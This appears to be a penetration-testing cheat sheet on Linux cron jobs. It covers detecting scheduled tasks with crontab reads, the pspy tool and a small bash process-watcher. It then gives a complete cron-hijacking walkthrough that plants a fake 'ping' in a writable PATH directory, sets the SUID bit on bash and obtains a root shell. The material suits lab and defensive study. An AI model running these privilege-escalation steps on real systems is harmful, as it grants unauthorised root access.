Cron
Detect
Global (All Users)
Check Tasks
cat /etc/crontab
Not Global (Per-User)
Check Tasks
Pspy
https://github.com/DominicBreuker/pspy
low@vulnyx:~$ cd /dev/shm
low@vulnyx:/dev/shm$ wget -q --no-check-certificate "https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64"
low@vulnyx:/dev/shm$ chmod +x pspy64
low@vulnyx:/dev/shm$ ./pspy64
Bash
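#!/bin/bash
# Poll the process table and print the commands that appeared or vanished
# between two consecutive snapshots. Intended as a minimal stand-in for pspy
# when the system crontabs are not readable: a job that is launched by cron
# shows up as a new command line for as long as it runs.
#
# Each reported line is the raw `diff` normal-format line:
#   "> cmd"  command that is running now and was not in the previous snapshot
#   "< cmd"  command that was in the previous snapshot and has gone
#
# The loop does not sleep, so it keeps one core busy while watching; very
# short-lived jobs may still fall between two `ps` calls and go unreported.

# Process names that churn constantly and would only add noise.
readonly filter="kworker|command|defunct"

#######################################
# Take a snapshot of the command column of every process.
# Outputs: one command line per process on stdout
#######################################
snapshot() {
  ps -eo command
}

#######################################
# Print the lines that differ between two snapshots, minus the noise filter.
# Arguments: $1 - previous snapshot, $2 - current snapshot
# Outputs:   diff lines starting with "<" or ">" that do not match $filter
# Returns:   0 always; grep's "no match" status is deliberately ignored so
#            a quiet interval is not treated as an error by the caller
#######################################
report_changes() {
  local previous=$1 current=$2
  # Anchor on the diff marker. The original pattern "[\>\<]" was unanchored
  # and, inside a bracket expression, the backslash is a literal character,
  # so any command line containing "\", "<" or ">" anywhere was reported.
  diff <(printf '%s\n' "$previous") <(printf '%s\n' "$current") \
    | grep '^[<>]' \
    | grep -vE -- "$filter" || true
}

# Ctrl-C ends the watch with a non-zero status.
ctrl_c() {
  exit 1
}
trap ctrl_c INT

old=$(snapshot)
while true; do
  new=$(snapshot)
  report_changes "$old" "$new"
  old=$new
done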
Cron Hijacking
Check Tasks
pi@raspberry:~ $ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/var/www/html:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root ping -c1 raspberrypi.com
pi@raspberry:~ $ which ping
/usr/bin/ping
pi@raspberry:~ $ grep "PATH" /etc/crontab |sed 's/PATH=//; s/:/\n/g'
/usr/local/sbin
/usr/local/bin
/sbin
/var/www/html
/bin
/usr/sbin
/usr/bin
pi@raspberry:~ $ ls -l /var/www/
total 4
drwxrwxrwx 2 www-data www-data 4096 ene 7 2024 html
Abuse
pi@raspberry:~ $ which bash chmod
/usr/bin/bash
/usr/bin/chmod
pi@raspberry:~ $ ls -l /usr/bin/bash
-rwxr-xr-x 1 root root 1367848 mar 27 2022 /usr/bin/bash
pi@raspberry:~ $ echo '/usr/bin/chmod 4755 /usr/bin/bash' >/var/www/html/ping
pi@raspberry:~ $ /usr/bin/chmod +x /var/www/html/ping
pi@raspberry:~ $ ls -l /bin/bash
-rwsr-xr-x 1 root root 1367848 mar 27 2022 /bin/bash
pi@raspberry:~ $ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(pi) gid=1000(pi) euid=0(root) grupos=1000(pi)
raspberry